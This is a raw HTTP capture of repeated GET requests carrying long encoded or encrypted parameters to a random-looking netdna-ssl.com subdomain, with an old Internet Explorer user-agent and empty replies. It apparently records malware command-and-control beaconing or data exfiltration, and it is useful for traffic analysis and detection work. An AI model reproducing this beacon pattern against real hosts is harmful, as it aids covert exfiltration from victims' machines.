GET /27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1gHhLicvnhfXymF904v4t2DhvUiLCZht1Hw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTGCGrpHNYuwVpXZrelYJPLUrmhU/capljenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIUtlaETKETqg HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:01 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=eISsn0A7mAYLpXZ/jUeRRk7/thpU6drhyMlYLXuYTiRA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZTLhu0b45kiT/aaY YTEt5Uvbfo/lsLEXHKYX3Ti/i3YMtu6Il6K42sySWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZUJD JjGgvFhGLn0MD/WjZWexOfnH1gmTKsGcMQF H3w== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:02 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=j7YMo/n29XMqqDJt46TNcYgi1NSnhIRtqIy9bCyCQhEoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU45GNURXUmydpYo7BIbpw2ovkf72qWT44FpQS3i7uWq3ezON/xOlvEs7vfzzreFiaRhN0IP0XA xvtgKkdlz1lRocVwJfcRD1hSQlC/zd7KOiMVqC1aQjPYhHXQCU3Lc8Q3I09qFSwMRx7chrAtAyGHdP0R3cfJ7wsVP0mBGThSfj2Y743nJF0Et2KSc6n6A 69 G16P6Q/NHHP17JfUpG Ji5arKdNEreckyFWuwLl8SUgCLrWouma3IRzlg AfWd4lkaGHrSYSPAUGF/VaQ721H65Q0hM/lq0CiIjt69UWEXAlPNSddhz9LPVA2pp5No30Bplu5X17vgTHWpj//cWf8TQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rIbWKV/gtMGWu5/WaQkmuyHmpRoHgsHgME= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:02 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=j7YMo/n29XMqqDJt46TNcYgi1NSnhIRtqIy9bCyCQhEoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU45GNURXUmydpYo7BIbpw2ovkf72qWT44FpQS3i7uWq3ezON/xOlvEs7vfzzreFiaRhN0IP0XA xvtgKkdlz1lRoVez2xuA6YrxdKm30ZIdZdA/6UnSy/9g5ij9W2jsh ZY4cGjsXTcXKxAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3cdBa1e8eaz1xJq30BnBykcZjhRhNNnVmEbsjT/KCK3V HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:02 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=wlkQ3WKgYpSE2rQtmh2LBE7/thpU6drhyMlYLXuYTiRA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZTLhu0b45kiT 2Xfi4eCjhjMjKRY6Iofb7pjurIyC9QLCNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNV6LgZQ8/fOZCiThn9Pg6 S4c9vITM5TWw HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:02 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=j7YMo/n29XMqqDJt46TNcYgi1NSnhIRtqIy9bCyCQhEoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU45GNURXUmydpYo7BIbpw2ovkf72qWT44FpQS3i7uWq3ezON/xOlvEs7vfzzreFiaRhN0IP0XA xvtgKkdlz1lRoY09ECF87Zuss IILilpWF1SqCHr/94rW31vzipeVYvpr maR6b3/MexiezSykY/Z1O8xmMRVWZOb7j5JAyiJ5DwvGnwcuiCjBHn3WtPO7TkPk55LBQN29raE2JuypHmFWVSvOHNjNGnChhLYWo4Y/ac5Rhs262b79EFhM2/f2sowhNepyLa8nM= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:03 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=QgW8pN5r26ZQhScA1jb3T4/h8s/3htVFnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRlQkP4mMaC8WEYufQwP9aNlZ7E5 cfWCZBVWaKclJYCzDHGXB7YFOPGAqkMremTu1SEeEcwb8K7i333RAvM0VMA8vsH YHvRtveyr8vVjKUos IILilpWF0OiEhuPxDpVrvBOGo5I8L8Nh3QJEALW3TAEnwHOHrhhSSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZUJD JjGgvFhGLn0MD/WjZWexOfnH1gmTKsGcMQF H3w== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:03 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=rdr4ABua5zdnA3VLGqrT9ZTha5n8fKHmaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO31QHs3X92ilEoPfCrfVvRJhQC drCF7eF8q1Ber6XmkpQzH1M0FuaRLhj0DU1QbcRtcNvMmRKJ05TvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdva2hNibsqR5hVlUrzhzYzRpwoYS2FqOGP2nOUYbNutm /RBYTNv39rKMITXqci2vJz HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:03 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=PcwT4QFtuPClUB4b/muCJY/h8s/3htVFnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRlQkP4mMaC8WEYufQwP9aNlZ7E5 cfWCZBVWaKclJYCzDHGXB7YFOPGAqkMremTu1SEeEcwb8K7i333RAvM0VMCMAVuazOQA/ySFcG0T/jYU B 0jBTIO6c73FtBcCD66pyI/h/Xw7wdFAL52sIXt4Xfzqkf5HpieYAG6kIeOqURJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRlQkP4mMaC8WEYufQwP9aNlZ7E5 cfWCZMqwZwxAX4ff HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:03 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=N6dOqWm8Q97B 4EkIHdGP3TONeCOZhCdnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRlQkP4mMaC8WEYufQwP9aNlZ7E5 cfWCZBVWaKclJYCzDHGXB7YFOPGAqkMremTu1SEeEcwb8K7i4nJwzEzT2yGMAVuazOQA/ySFcG0T/jYU B 0jBTIO6c73FtBcCD66pyI/h/Xw7wdFAL52sIXt4Xfzqkf5HpieYAG6kIeOqURJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRlQkP4mMaC8WEYufQwP9aNlZ7E5 cfWCZMqwZwxAX4ff HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:04 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=xY8ohDYpM gLjT49fHfOTNcxGaPWyPpOjvdcLv9L0UIbIGZvOdVpu1XTUggPGJK SlCyq068/M1FOTAwlw8YF8PMHri1e7C9NPJ5v96kxwbVWTFo Vb8YXwF8xC533FcDPI5dGTWg7/48CMVjnZqYc8xmpxiLTPo dgTcNa6NZpFhap1svS6Dz9hP8ILQ7STKYX3Ti/i3YPTQLrSsAb MLus5Wbw9bkMfiZm 4OAHnaoKai08bVxwYEQnuvuDBXEJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRlQkP4mMaC8WEYufQwP9aNlZ7E5 cfWCZMqwZwxAX4ff HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:04 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=/k6kR j50trrVVBzJuBn8mByKcxzlv585nZO8ehumXaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyG1ilf4LTBlruf1mkJJrsh3aBPWykaiHXFOOgkw2kW7w1VF3DkXHmZ3gsKUEsaySJr1EjiAPKYgDfV9OCtHXZfA3mXJEY39mHAhwsRGINruhhsseF9XKGr8l4l5 9UEJ lex/kVKG eu03e5/1jzsDq/1bjUefs49JU1ySiay1sqdymVuPyjsZ40oQa07NiSGUE1ePzby02CzsHlRkWrcy9e991jqD0JbjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVei4GUPP3zmQok4Z/T4OvkuHPbyEzOU1sA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:04 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=/k6kR j50trrVVBzJuBn8mByKcxzlv585nZO8ehumXaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyG1ilf4LTBlruf1mkJJrsh3aBPWykaiHXFOOgkw2kW7w1VF3DkXHmZ3gsKUEsaySJr1EjiAPKYgDfV9OCtHXZfA3mXJEY39mHAhwsRGINruja7CNvvxDM30ViblVFPL pCuWqMo7ZG/Qxztg6 4zwmphq5YRs3Ua3kOLZWZ3INLBBsDkaVI3AuytGSEdboIzGfiB 3gBuZcl5Xe6ZTKO9HKqfV3Ow7bWoU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0acKGEthajhj9pzlGGzbrZvv0QWEzb9/ayjCE16nItrycw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:04 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Sat, 01 Aug 2015 04:17:04 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

GET /27944.ashx?e=eISsn0A7mAYLpXZ/jUeRRk7/thpU6drhyMlYLXuYTiRA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZTLhu0b45kiT/aaY YTEt5Uvbfo/lsLEXHKYX3Ti/i3YNYlTZYFVSl7P5bll8sXmM6QI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiY5ZMFGhcknP srAPq35vVlHiPVU04Syd3HQWtXvHms9cSat9AZwcpHGY4UYTTZ1ZhG7I0/ygit1Q== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:00 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=s0jsdppK9OtnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuxxTYwWxYG9WM2wWArmgLQLkUIHBGIcHxGIGRftF69MkkCN9h bV19V1Gg4F6dkBzXUfBgwh1qVrROUvSdX2iqnJyMz45O1xrVtQeXCcg/Fhy2/UUM264sa8NVcbx dWxSReJECB10wJoxWgtYjek0x0XbBjJK/aOU= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:00 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=2v0SNuZrMFyRcITdAqjv5mByKcxzlv58TwZrOj6glduAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyG1ilf4LTBlruf1mkJJrsh3aBPWykaiHXFOOgkw2kW7w1VF3DkXHmZ3gsKUEsaySJZSXTHO//VDXFASu7RG65lHSpt9GSHWXQQ9Ss5KWeJ1R3qPv/BEEOxGiq9ZfonCR6Oox6FF19pfqJlifxMfc97cyVb1EWo6eKpVEOys WrB2aQstvfmMt gOHtlA/bkx4QI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiY5ZMFGhcknP srAPq35vVlHiPVU04Syd3HQWtXvHms9cSat9AZwcpHGY4UYTTZ1ZhG7I0/ygit1Q== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:00 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1i/TyjmwB5PDLPiCC4paVhdKFaiVC/aI3DG654koUNxkC3QPqxzrS768NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWNmhyT5r/ybNC1vKV8e/iGN5/nnDBjhbCFLZWhEyhE6oA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:01 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1g89M3w jUOHhMAGkRtqR4lD3rLLdbpIg4ArRJ9EKY7l4SdQYeWHlEHJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRlQkP4mMaC8WEYufQwP9aNlZ7E5 cfWCZMqwZwxAX4ff HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:01 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1hQ8FnfYbyw8RQC drCF7eFrF/wZm0XNBk92S527KGfc1 gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBfDzB64tXuwvTTyeb/epMcG1VkxaPlW/GE= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:01 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1gOTLcOqfVOXSmF904v4t2DcTuPEvZOc8eNpxrUgcko41 gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBfDzB64tXuwvTTyeb/epMcG1VkxaPlW/GE= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:01 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1iSr4DTw5uXZI4G r 3F6T7Ye9UEEkdnkZTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdva2hNibsqR5hVlUrzhzYzRpwoYS2FqOGP2nOUYbNutm /RBYTNv39rKMITXqci2vJz HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:01 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=eISsn0A7mAYLpXZ/jUeRRk7/thpU6drhyMlYLXuYTiRA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZTLhu0b45kiT/aaY YTEt5Uvbfo/lsLEXHKYX3Ti/i3YP62O0yjhYNJo2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1XouBlDz985kKJOGf0 Dr5Lhz28hMzlNbA= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:02 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=eISsn0A7mAYLpXZ/jUeRRk7/thpU6drhyMlYLXuYTiRA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZTLhu0b45kiT/aaY YTEt5Uvbfo/lsLEXHKYX3Ti/i3YNTTdRaBizOJsTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rIbWKV/gtMGWu5/WaQkmuyHmpRoHgsHgME= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:02 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=j7YMo/n29XMqqDJt46TNcYgi1NSnhIRtqIy9bCyCQhEoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU45GNURXUmydpYo7BIbpw2ovkf72qWT44FpQS3i7uWq3ezON/xOlvEs7vfzzreFiaRhN0IP0XA xvtgKkdlz1lRoTp7ys67qImnFAL52sIXt4XOSMm4SbI/lC36 lBzVeTnLb9RQzbrixrw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTGCGrpHNYuwVpXZrelYJPLUrmhU/capljenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIUtlaETKETqg HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:02 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1jk8Kba5gyWOQTxIUcsgQ wHN378SfA9Jw2vwNjRSVjtK08O3cXugjd nyapwjUqvQzsAhT5Gds122TndWfocfATyDhi3Wnjo0frAy8J59dd9rgBtSK5GMJ2nwKHV4nKhQuTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45GNURXUmydpYo7BIbpw2ovu3bfNrUBKNV HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:02 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=2UW/O98m6H IItTUp4SEbaiMvWwsgkIRKB2ZKuKuT4UgLxC0aXqYrUEev CIr75kR01FXcnLDv1034RmeWOWUy4btG OZIk/mETyJyixTFVdn5IXPnT9 7PiCC4paVhdJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AmkdnXmY5ntEg== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:03 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

